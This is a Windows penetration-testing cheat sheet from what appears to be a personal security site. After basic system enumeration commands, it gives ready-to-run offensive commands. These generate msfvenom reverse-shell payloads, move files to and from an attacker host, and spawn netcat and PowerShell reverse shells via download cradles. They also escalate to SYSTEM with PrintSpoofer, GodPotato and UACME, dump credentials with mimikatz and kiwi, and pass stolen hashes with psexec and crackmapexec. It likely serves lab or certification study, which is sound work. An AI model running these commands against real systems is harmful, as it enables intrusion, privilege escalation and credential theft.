HomeGitHubPortfolioTwitter/XMediumCont@ct

Cheatsheet

Topics

  1. Introduction to the Windows Shells

  2. Windows Permissions

  3. Reverse Shells in Windows

  4. SeImpersonatePrivilege Exploitation

  5. On Cross Compilation

  6. Windows Services

  7. Weak Service Permissions

  8. Unquoted Service Path

  9. DLL Hijacking

  10. Always Install Elevated

  11. Files with Sensitive Data

  12. Windows Hashes

  13. Stored Credentials and the Windows Vault

  14. Scheduled Task

  15. Critical Registry Paths

  16. Useful Tools

  17. AMSI Bypass

Windows Privesc Methodology

Hexdump CheatSheet

Win Enumeration

System Information Commands

  • Operating System and Version:

    systeminfo      # Displays detailed system information
ver             # Displays Windows version
winver          # Displays Windows version and build number
msinfo32        # Opens System Information tool.
wmic os get name,version,buildnumber # Retrieves OS version/build info

  • Hardware Information:

    getmac /v       # Displays MAC address  
hostname        # Displays computer name

  • Environment Variables:

    set             # Lists all environment variables  
echo %PATH%     # Prints a specific environment variable
path            # Displays or modifies the PATH environment variable

File System and Directory Management

  • Navigation and Directory Structure:

    cd               # Change current directory  
dir              # List files and directories  
tree             # Graphical view of directory structure

  • File Operations:

    type NUL > file.txt     # Create a new file  
echo "text" > file.txt  # Write text into a file  
type file.txt           # Display file contents  
del file.txt            # Delete a file  
copy file1 file2        # Copy files  
move file1 folder/      # Move files  
ren oldname new_name     # Rename files

  • Directory Operations:

    mkdir new_folder          # Create a directory  
rd folder_name            # Remove a directory

3. Networking Commands

  • Network Information:

    ipconfig /all            # Displays all network interfaces  
netstat -ano             # Shows network connections and listening ports  
route print              # Displays the routing table  
netsh wlan show profiles # Shows Wi-Fi profiles

  • Testing and Troubleshooting:

    ping google.com          # Test connectivity  
tracert microsoft.com    # Trace route to a destination  
nslookup google.com      # DNS queries

Permissions and User Management

  • User Information:

    whoami                   # Displays current user  
whoami /groups           # Lists user groups  
whoami /priv             # Shows user privileges
net user                 # Lists all users  
net user <USERNAME>      # Displays user details  
net localgroup Administrators #Manages local groups

  • Permissions and Policies:

    icacls file.txt          # Displays file permissions  
net accounts             # Displays account policies  
gpupdate /force          # Updates Group Policy settings  
gpresult /r              # Displays Group Policy results

Process and Service Management

  • Process Management:

    tasklist                 # Lists running processes  
taskkill /IM process.exe /F   # Terminates processes

  • Service Management:

    net start "ServiceName"        # Starts a service
sc.exe start <SERVICE>         # Starts a service
net stop "ServiceName"         # Stops a service
sc.exe stop <SERVICE>          # Stops a service
sc query                       # Queries Windows services
sc.exe qc <SERVICE>            # Checks Service Configuration
Get-Service                    # PowerShell alternative for service details
sc.exe config <SERVICE> binPath="C:\Path\to\malicious.exe" #Changes the Binary Path of a Service
sc.exe sdshow <SERVICE>        # Checks Service Permissions
sc.exe sdset <SERVICE> <SDDL>  # Updates Service Permissions
.\accesschk64.exe /accepteula -uwcqv SimpleService  # Verify Service Permissions
ConvertFrom-SddlString -Sddl <SDDL> #Convert SDDL to Readable Format
wmic process list full | Select-String 'executablepath=C:' | Select-String -NotMatch 'system32|syswow' #Get Executable Path for All Processes
x86_64-w64-mingw32-gcc -mwindows -municode -O2 -s -o simpleService.exe simpleService.c #Compiling a Custom Service

Windows System Utilities

  • Administrative Tools:

    mmc                     # Opens Microsoft Management Console  
eventvwr                # Opens Event Viewer  
services.msc            # Opens Services Management Console

  • Performance and Disk Management:

    perfmon                 # Opens Performance Monitor  
resmon                  # Opens Resource Monitor  
diskmgmt.msc            # Opens Disk Management  
cleanmgr                # Opens Disk Cleanup  
defrag C:               # Defragments the drive

PowerShell - System, User, Process and Service

  • PowerShell Commands for Local Accounts:

    Get-LocalUser           # Lists local users  
Get-LocalGroup          # Lists local groups  
Get-LocalGroupMember <GROUP_NAME>  # Lists members of a group

  • System File Management:

    sfc /scannow            # Scans and repairs system files  
chkdsk C: /f            # Checks and fixes disk errors

  • Registry and Configuration Management:

    reg query HKLM\Software         # Queries the registry  
msconfig                        # Opens System Configuration

  • List Environment Variables

    dir env:

  • Search Files Recursively

    Get-ChildItem -Path C:\Users\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users\ -Include *.txt -File -Recurse -ErrorAction SilentlyContinue

  • List Running Processes

    Get-Process

  • List Installed Applications (32-bit)

    Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | Select-Object DisplayName

  • List Installed Applications (64-bit)

    Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | Select-Object DisplayName

  • Retrieve Service Information

    Get-Service * | Select-Object DisplayName,Status,ServiceName,Can*
Get-CimInstance -ClassName Win32_Service | Select-Object Name,State,PathName | Where-Object {$_.State -like 'Running'}

File Transfer and Reverse Shell

Generate a reverse shell payload

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exe

Using certutil Certutil is a Windows tool that can download files:

certutil -urlcache -split -f http://attacker_ip/file.exe file.exe

Using PowerShell PowerShell (iwr) can download files via HTTP:

Invoke-WebRequest -Uri http://attacker_ip/file.exe -OutFile file.exe

Using FTP Windows supports FTP commands:

ftp
open <attacker_ip>
put file.txt
get file.txt

Using SMB Shares Files can be transferred using network shares:

net use \\<attacker_ip>\share /user:username password
copy file.exe \\<attacker_ip>\share

Netcat Set up a listener on the attacker machine:

nc -lvp 4444 > file.exe

Send the file from the target:

nc attacker_ip 4444 < file.exe

Python Simple HTTP Server On the attacker machine:

python3 -m http.server 80

On the target machine:

certutil -urlcache -split -f http://attacker_ip/file.exe file.exe

Spawning a Reverse Shell

cmd.exe

The cmd.exe reverse shell relies on utilities like ncat.exe to establish a connection. The process involves downloading the necessary binary, setting up a listener on the attacker machine, and initiating the reverse connection from the victim machine.

Steps

  1. Download ncat.exe on the Target Machine ncat.exe (a lightweight implementation of Netcat) is required for creating the reverse shell.

    iwr -uri "https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe" -OutFile nc64.exe

  2. Set Up a Listener on the Attacker Machine The attacker machine must have a listener ready to receive the reverse connection.

    nc -lvnp 7777

  3. Initiate the Reverse Shell from the Target Machine On the victim machine, execute the following command to connect back to the attacker and spawn a shell:

    C:\Users\Quickemu\Desktop\nc64.exe 192.168.122.1 7777 -e cmd

Powershell

Using Invoke-PowerShellTcp.ps1 Script

Invoke-PowerShellTcp.ps1 is a PowerShell script designed for reverse shells.

  1. Download the Script on the Attacker Machine

    wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

  2. Configure the Script Add the line to specify the attacker's IP and port:

    echo "Invoke-PowerShellTcp -Reverse -IPAddress <Attacker_Machine> -Port 7777" >> Invoke-PowerShellTcp.ps1

  3. Host the Script on an HTTP Server Use Python to serve the script for download:

    python3 -m http.server 1337

  4. Start listening mode with Netcat on attacker machine 

    netcat -nvlp 7777

  5. Execute the Script from the Target Machine

    • From CMD:

      powershell -c "iex(new-object net.webclient).downloadstring(\"http://192.168.122.1:1337/Invoke-PowerShellTcp.ps1\")"

    • From PowerShell:

      iex(new-object net.webclient).downloadstring("http://<Attacker_Machine>:1337/Invoke-PowerShellTcp.ps1")

Win Priv Esc

SeImpersonatePrivilege

Checking for SeImpersonatePrivilege

To verify whether the current user has this privilege, run the following:

whoami /priv

Sample Output

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeImpersonatePrivilege        Impersonate a client after authentication Enabled

If the SeImpersonatePrivilege is enabled, the user can exploit it for privilege escalation using tools like PrintSpoofer or GodPotato.

SeImpersonatePrivilege Privilege Escalation

Initial Setup

  1. Start a Listener on the Attacker Machine

    nc -lvnp 5555

  2. Download Netcat on the Victim Machine

    iwr -uri "https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe" -Outfile nc64.exe

PrintSpoofer

PrintSpoofer leverages misconfigured print spooler services to escalate privileges to SYSTEM.

  1. Download the Exploit

    iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -Outfile PrintSpoofer64.exe

  2. Execute the Exploit Run the following command to establish a SYSTEM shell:

    PrintSpoofer64.exe -c "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"

GodPotato

  1. Identify .NET Framework Version Use the following command to determine the .NET version installed:

    reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

  2. Download the Appropriate GodPotato Version Depending on the .NET version:

    • .NET 2.0:

      iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe" -Outfile GodPotato-NET2.exe

    • .NET 3.5:

      iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe" -Outfile GodPotato-NET35.exe

    • .NET 4.0:

      iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe" -Outfile GodPotato-NET4.exe

  3. Execute the Exploit Use the appropriate executable to escalate privileges and spawn a reverse shell:

    .\GodPotato-NET2.exe -cmd "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"

winPEAS

  1. Download the binary:

wget https://github.com/peass-ng/PEASS-ng/releases/download/20241011-2e37ba11/winPEASx64.exe

  1. Running winPEAS to Enumerate Services

    Use the servicesinfo option to gather information about services:

.\winPEASx64.exe quiet servicesinfo

Kernel

# WIN KERNEL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP> LPORT=<LOCAL_PORT> -f exe -o payload.exe

python3 -m http.server
# Download payload.exe on target
## Windows-Exploit-Suggester Install
mkdir Windows-Exploit-Suggester
cd Windows-Exploit-Suggester
wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py
# ^^ This is a python3 version of the script

cd Windows-Exploit-Suggester
python ./windows-exploit-suggester.py --update
pip install xlrd --upgrade

./windows-exploit-suggester.py --database YYYY-MM-DD-mssb.xlsx --systeminfo win7sp1-systeminfo.txt

./windows-exploit-suggester.py --database YYYY-MM-DD-mssb.xlsx --systeminfo win2008r2-systeminfo.txt
## METASPLOIT
## Global set
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>

use exploit/multi/handler 
options
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <LOCAL_HOST_IP>
set LPORT <LOCAL_PORT>

use post/multi/recon/local_exploit_suggester
set SESSION <HANDLER_SESSION_NUMBER>

## MsfConsole Meterpreter Privesc
getprivs
getsystem

# Exploitable vulnerabilities modules
exploit/windows/local/bypassuac_dotnet_profiler
exploit/windows/local/bypassuac_eventvwr
exploit/windows/local/bypassuac_sdclt
exploit/windows/local/cve_2019_1458_wizardopium
exploit/windows/local/cve_2020_1054_drawiconex_lpe
exploit/windows/local/ms10_092_schelevator
exploit/windows/local/ms14_058_track_popup_menu
exploit/windows/local/ms15_051_client_copy_image
exploit/windows/local/ms16_014_wmi_recv_notif

UAC

# UAC - UACME

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP> LPORT=<LOCAL_PORT> -f exe > backdoor.exe

## METASPLOIT - Listening
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>

use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <LOCAL_HOST_IP>
set LPORT <LOCAL_PORT>

## Meterpreter (Unprivileged session)
cd C:\\
mkdir Temp
cd Temp
upload /root/backdoor.exe
upload /root/Desktop/tools/UACME/Akagi64.exe
shell
Akagi64.exe 23 C:\Temp\backdoor.exe

akagi32.exe [Key] [Param]
akagi64.exe [Key] [Param]

## Elevated Meterpreter Received on the listening session
ps -S lsass.exe
migrate <lsass_PID>
hashdump

Access Token

# ACCESS TOKEN IMPERSONATION

## METASPLOIT - Meterpreter (Unprivileged session)
pgrep explorer
migrate <explorer_PID>
getuid
getprivs

load incognito
list_tokens -u
impersonate_token "ATTACKDEFENSE\Administrator"
getuid
getprivs # Access Denied
pgrep explorer
migrate <explorer_PID>
getprivs
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

Windows Credential Dumping

# Exploitation
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TARGET_IP> LPORT=1234 -f exe > payload.exe

python -m SimpleHTTPServer 80

#Grant Privilege to a User:
Add-LocalGroupMember -Group "Backup Operators" -Member "Leonardo"
#Save SAM and SYSTEM Files:
reg save hklm\sam C:\Users\Leonardo\Desktop\SAM.hive
reg save hklm\system C:\Users\Leonardo\Desktop\SYSTEM.hive


## METASPLOIT
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>

use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <LOCAL_HOST_IP>
set LPORT <LOCAL_PORT>
run

## On target system
certutil -urlcache -f http://<TARGET_IP>/payload.exe payload.exe
# Run payload.exe

# METASPLOIT - Meterpreter
sysinfo
getuid
pgrep lsass
migrate <explorer_PID>
getprivs

# Creds dumping - Meterpreter
load kiwi
creds_all
lsa_dump_sam
lsa_dump_secrets

# MIMIKATZ
cd C:\\
mkdir Temp
cd Temp
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
shell

mimikatz.exe
privilege::debug
lsadump::sam
lsadump::secrets
sekurlsa::logonPasswords
mimikatz64.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

# PASS THE HASH
## sekurlsa::logonPasswords
background
search psexec
use exploit/windows/smb/psexec
set LPORT <LOCAL_PORT2>
set SMBUser Administrator
set SMBPass <ADMINISTRATOR_LM:NTLM_HASH>
exploit

System Logs

Get-History    # Retrieve Commands from Memory
(Get-PSReadlineOption).HistorySavePath    # Retrieve History File Location

Cracking Windows Hashes

#Download rockyou.txt:
curl -L https://github.com/danielmiessler/SecLists/raw/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz | tar -xz

#LM Hash:
john --format=lm --wordlist=rockyou.txt hash.txt
hashcat -m 3000 -a 3 hash.txt

#NTLM Hash:
john --format=nt --wordlist=rockyou.txt hash.txt
hashcat -m 1000 -a 3 hash.txt

#Net-NTLMv1:
john --format=netntlm --wordlist=rockyou.txt hash.txt
hashcat -m 5500 -a 3 hash.txt

#Net-NTLMv2:
john --format=netntlmv2 --wordlist=rockyou.txt hash.txt
hashcat -m 5600 -a 3 hash.txt

Crackmapexec

crackmapexec smb <TARGET_IP> -u Administrator -H "<NTLM_HASH>" -x "whoami"
Previous17 - AMSI Bypass

Last updated